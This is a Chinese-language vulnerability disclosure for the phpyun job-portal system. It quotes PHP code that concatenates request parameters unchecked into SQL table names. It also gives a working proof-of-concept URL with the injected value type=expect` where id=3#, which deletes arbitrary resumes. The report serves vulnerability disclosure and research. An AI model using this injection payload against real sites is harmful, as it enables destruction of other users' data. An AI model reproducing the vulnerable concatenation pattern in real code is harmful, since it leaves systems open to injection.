### 简要描述: phpyun人才系统(2015-02-03) SQL注入2枚(可删除任意简历)。无法绕过WAF，因此也获取不了敏感信息。 ### 详细说明: 代码位于 /wap/member/model/index.class.php： ``` function addresume_action()//复制的较长,可直接略过。 { if($this->config['user_enforce_identitycert']=="1") { $row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'"); if($row['idcard_status']!="1") { $data['msg']='请先登录电脑客户端完成身份认证!'; $data['url']='index.php'; } } if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->obj->complete($resume_row); $data['msg']='删除成功!'; }else{ $data['msg']='删除失败!'; } $data['url']='index.php?c=addresume&eid='.(int)$_GET['eid']; } if($_POST['submit']){ $_POST=$this->post_trim_iconv($_POST); if($_POST['eid']>0){ $table="resume_".$_POST['table']; $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where); }else{ $_POST['uid']=$this->uid; $nid=$this->obj->insert_into($table,$_POST); $this->obj->DB_update_all("user_resume","`$url`=`$url`+1","`eid`='".(int)$_POST['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_POST['eid']."'"); $this->obj->complete($resume_row); } 
$nid?$data['msg']='保存成功!':$data['msg']='保存失败!'; $data['url']=$nid?('index.php?c=addresume&eid='.(int)$_POST['eid']):''; $data['msg']=iconv('gbk','utf-8',$data['msg']); echo json_encode($data);die; } else{ if($_POST['name']==""){ $data['msg']='姓名不能为空!'; }else if($_POST['sex']==""){ $data['msg']='性别不能为空!'; }else if($this->config['user_idcard']=="1"&&trim($_POST['idcard'])==""){ $data['msg']='身份证号码不能为空!'; }else if($_POST['living']==""){ $data['msg']='现居住地不能为空!'; }else{ unset($_POST['submit']); $this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$this->uid); $where['uid']=$this->uid; $nid=$this->obj->update_once("resume",$_POST,$where); if($nid){ $this->obj->update_once("member",array('email'=>$_POST['email'],'moblie'=>$_POST['telphone']),$where); $this->obj->member_log("保存基本信息"); $data['msg']='保存成功!'; $data['url']='index.php?c=addresume'; }else{ $data['msg']='保存失败!'; $data['url']='index.php?c=addresume'; } } } } if(!$_GET['eid']&&$_POST['submit']==''){ $num=$this->obj->DB_select_once("member_statis","`uid`='".$this->uid."'"); $maxnum=$this->config['user_number']-$num['resume_num']; $confignum=$this->config['user_number']; if($maxnum<=0 &&$confignum!=""){ $data['msg']='你的简历数已经超过系统设置的简历数了!'; $data['url']='index.php?c=resume'; } }else if($_GET['eid']){ $row=$this->obj->DB_select_once("resume_expect","`id`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); include(PLUS_PATH."job.cache.php"); $job_classid=@explode(",",$row['job_classid']); foreach($job_classid as $v){ $jobname[]=$job_name[$v]; } $jobname=@implode(",",$jobname); $this->yunset("row",$row); $this->yunset("jobname",$jobname); $skill=$this->obj->DB_select_all("resume_skill","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $work=$this->obj->DB_select_all("resume_work","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $project=$this->obj->DB_select_all("resume_project","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); 
$edu=$this->obj->DB_select_all("resume_edu","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $training=$this->obj->DB_select_all("resume_training","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $cert=$this->obj->DB_select_all("resume_cert","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $other=$this->obj->DB_select_all("resume_other","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("skill",$skill); $this->yunset("work",$work); $this->yunset("project",$project); $this->yunset("edu",$edu); $this->yunset("training",$training); $this->yunset("cert",$cert); $this->yunset("other",$other); } $resume=$this->obj->DB_select_once("resume","`uid`='".$this->uid."'"); $this->yunset("resume",$resume); $this->yunset("layer",$data); $CacheArr['user'] =array('userdata','userclass_name'); $CacheArr['job'] =array('job_index','job_type','job_name'); $CacheArr['city'] =array('city_index','city_type','city_name'); $CacheArr['industry'] =array('industry_index','industry_name'); $CacheArr=$this->CacheInclude($CacheArr); $this->waptpl('addresume'); } ``` 这里我们可以看到： ``` $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); ``` 这里 $_GET['type'] 未经任何限制直接拼接进表名；后面 WHERE 条件中的 eid、id、uid 虽然做了 (int) 转换，但表名部分并不受这些转换保护，因此可以进行注入。 这个函数下面的内容也存在同样的问题： ``` $table="resume_".$_POST['table'];//重点、。。。。。 $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where); ``` 同理，下面这个函数也存在同样的问题： ``` function addresumeson_action() { if($_GET['id']){ 
$row=$this->obj->DB_select_once("resume_".$_GET['type'],"`id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");///重点。。。。。 $this->yunset("row",$row); } $this->user_cache(); $this->waptpl('addresumeson'); } ``` ### 漏洞证明: 如何删除任意简历： 简历在库中的信息如下： [<img src="https://images.seebug.org/upload/201503/311632570a194cc87a53dd3d82a2898d2aefd7e5.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311632570a194cc87a53dd3d82a2898d2aefd7e5.png) 我们构造 type=expect` where id=3#，请求 URL 如下： ``` http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23 ``` [<img src="https://images.seebug.org/upload/201503/31163450d40b1a5ffcee0cb82831f6c25cc965f4.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/31163450d40b1a5ffcee0cb82831f6c25cc965f4.png) [<img src="https://images.seebug.org/upload/201503/311634598420971fe848e95521927af894ecb9ce.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311634598420971fe848e95521927af894ecb9ce.png)